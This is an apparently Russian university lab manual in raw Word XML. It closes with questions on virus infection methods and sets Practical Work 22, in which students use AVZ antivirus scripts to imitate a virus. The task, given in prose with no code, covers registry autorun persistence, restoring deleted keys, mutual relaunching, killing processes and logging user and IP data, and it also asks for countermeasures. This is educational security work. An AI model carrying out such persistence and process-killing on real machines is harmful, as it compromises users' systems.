          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С помощью чего и как именно можно выполнить эвристическую пр</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF353E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF353E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>верку системы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00EF353E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:t>Инфицирование методом переименования EXE-файла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:t>Внедрение способом сдвига.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00EF353E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00EF353E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:t>Внедрение способом переноса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="146" w:name="_Toc503720811"/>
      <w:bookmarkStart w:id="147" w:name="_Toc3811342"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа 22</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Работа скриптов программы AVZ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться практически, применять возможности подс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы программы AVZ для реализации аналога алгоритма работы вирусов, п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иска и устранения последствий работы программ-вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>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jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Оборудование и материалы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Аппаратура.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для выполнения лабораторной работы необходим перс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нальный компьютер со следующими характеристиками: процессор Pentium, оперативная память </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не менее 2 Гбайт и более, свободное дисковое простра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ство </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не менее 100 MB Мбайт, устройство для чтения компакт-дисков, мон</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тор типа Super VGA (число цветов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 256). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программное обеспечение</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для выполнения лабораторной работы нео</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ходима операционная система WINDOWS, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>библиотека</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft .NET Framework версии 1.1 или выше, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рограмма Mathcad 13 и выше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Указания по технике безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">При выполнении лабораторной работы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запрещается</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>самостоятельно производить ремонт персонального компьютера, а также установку и удаление имеющегося программного обеспечения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>нарушать общепринятые правила техники безопасности при работе с электрооборудованием, в частности, касаться электрических розеток металл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve">ческими предметами и т.д.; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>принимать пищу, напитки и сорить на рабочем месте пользователя персонального компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В случае неисправности персонального компьютера необходимо </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>неме</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ленно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сообщить об этом обслуживающему персоналу лаборатории (системному а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>министратору, оператору).</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Необходимо создать и продемонстрировать работу скриптов АВЗ, опис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние которых приведено ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Создать скрипт №1 в ветках HKU и  HLM в разделах автозапуска зап</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">си для запуска программы AVZ с параметром запуска скрипта </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Создать на ПК в папках пользователя и ОС скрипт №2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Запустить вручную скрипт №1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Скрипт №2 в цикле должен реализовывать следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1. Если скрипт №1 завершится произвести его переименование и запуск;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.2. Если исчезла созданная ветка в реестре перезаписать её через 5 с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кунд;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.3. Если запущен процесс калькулятора завершить его и выдать сооо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щение;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. Если не удаётся завершить процесс калькулятора то создать копию скрипта №2 на диске С и запустить его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. Оба скрипта при запуске должны записывать в файл лога - имя польз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вателя, время, дату, список запущенных процессов, ip-адрес ПК.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчёт должен содержать описание  всех процедур, функций и возможн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стей скриптов (без примеров).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Для защиты работы продемонстрировать работу скрипта, объяснить пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цесс работы и результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1506"/>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разработанной программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1506"/>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Принципа работы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1506"/>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Результата работы разработанной программы (в графическом виде или показать в аудитории);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Комплекса мер по противодействию работы разработанной пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчеты сдать в электронном виде в папку Вирусы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
